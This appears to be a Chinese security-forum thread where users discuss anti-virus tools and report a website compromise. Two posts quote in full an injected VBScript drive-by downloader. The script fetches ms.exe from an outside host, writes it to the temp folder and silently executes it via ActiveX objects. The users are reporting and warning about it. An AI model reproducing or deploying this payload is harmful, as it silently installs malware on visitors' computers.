瑞星卡卡安全论坛

引用:

【breach的贴子】 看下图 ………………

谢谢了 收到`

搞什么`` 我按一次 出来2个回复```

学习中！

佩服！

SSM有免费版的么？

tiny一般个人用户貌似没必要~0~

要去卡卡举报一下啦，呵呵

引用:

【刀刀笨贼的贴子】我在h**p://www.z213.com/z213/就发现了这个,不过这网站几天前被黑过,管理员将被改动的公告区修复了,但是我22号晚上看时,网页尾部还是有:h**p://www.23597.com/pc/css.js 内容是: document.writeln("<script language=\"VBScript\">"); document.writeln("    on error resume next"); document.writeln("dl = \"http:\/\/www.23597.com\/pc\/ms.exe\""); document.writeln("    Set df = document.createElement(\"\")"); document.writeln("    df.setAttribute \"classid\", \"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\""); document.writeln("    str=\"Microsoft.XMLHTTP\""); document.writeln("    Set x = df.Create(str,\"\")"); document.writeln("    a1=\"Ado\""); document.writeln("    a2=\"db.\""); document.writeln("    a3=\"Str\""); document.writeln("    a4=\"eam\""); document.writeln("    str1=a1&a2&a3&a4"); document.writeln("    str5=str1"); document.writeln("    set S = df.create(str5,\"\")"); document.writeln("    S.type = 1"); document.writeln("    str6=\"GET\""); document.writeln("    x.Open str6, dl, False"); document.writeln("    x.Send"); document.writeln("    fname1=\"g0ld.com\""); document.writeln("    set F = df.create(\"Scripting.FileSystem\",\"\")"); document.writeln("    set tmp = F.GetSpecialFolder(2) "); document.writeln("    fname1= F.BuildPath(tmp,fname1)"); document.writeln("    S.open"); document.writeln("    S.write x.responseBody"); document.writeln("    S.savetofile fname1,2"); document.writeln("    S.close"); document.writeln("    set Q = df.create(\"Shell.Application\",\"\")"); document.writeln("    Q.ShellExecute fname1,\"\",\"\",\"open\",0"); document.writeln("    <\/script>") 不知道是管理员疏忽和还是这个网站本来就是挂着的..... ………………

刀刀最近常来哇


我的http://kvirus.bokee.com/5574384.html

学习了

学习了

引用:

【baohe的贴子】【回复“【火影】我爱罗”的帖子】 我手头那点儿东西，常在社区混的都知道：SSM、TINY、瑞星或卡巴斯基。其它的小零碎还有：IceSword、autoruns、SREng、HijackThis。这些，不是同时都用哦！根据具体问题选择。 ………………

像我这样的
就算知道了也不会用

大家看个事 这个帖25楼的用户 他发的帖子数和他的等级  貌似有点````

引用:

【艾玛的贴子】 引用: 【刀刀笨贼的贴子】我在h**p://www.z213.com/z213/就发现了这个,不过这网站几天前被黑过,管理员将被改动的公告区修复了,但是我22号晚上看时,网页尾部还是有:h**p://www.23597.com/pc/css.js 内容是: document.writeln("<script language=\"VBScript\">"); document.writeln("    on error resume next"); document.writeln("dl = \"http:\/\/www.23597.com\/pc\/ms.exe\""); document.writeln("    Set df = document.createElement(\"\")"); document.writeln("    df.setAttribute \"classid\", \"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\""); document.writeln("    str=\"Microsoft.XMLHTTP\""); document.writeln("    Set x = df.Create(str,\"\")"); document.writeln("    a1=\"Ado\""); document.writeln("    a2=\"db.\""); document.writeln("    a3=\"Str\""); document.writeln("    a4=\"eam\""); document.writeln("    str1=a1&a2&a3&a4"); document.writeln("    str5=str1"); document.writeln("    set S = df.create(str5,\"\")"); document.writeln("    S.type = 1"); document.writeln("    str6=\"GET\""); document.writeln("    x.Open str6, dl, False"); document.writeln("    x.Send"); document.writeln("    fname1=\"g0ld.com\""); document.writeln("    set F = df.create(\"Scripting.FileSystem\",\"\")"); document.writeln("    set tmp = F.GetSpecialFolder(2) "); document.writeln("    fname1= F.BuildPath(tmp,fname1)"); document.writeln("    S.open"); document.writeln("    S.write x.responseBody"); document.writeln("    S.savetofile fname1,2"); document.writeln("    S.close"); document.writeln("    set Q = df.create(\"Shell.Application\",\"\")"); document.writeln("    Q.ShellExecute fname1,\"\",\"\",\"open\",0"); document.writeln("    <\/script>") 不知道是管理员疏忽和还是这个网站本来就是挂着的..... ……………… 刀刀最近常来哇 我的 ………………

我到处游滴....

PF..不过..按这个方法..我找不到那个程序啊..天..我的电脑跟别人不同么??泪
而且今天升级到18.44.42..还是没报这病毒啊..

学习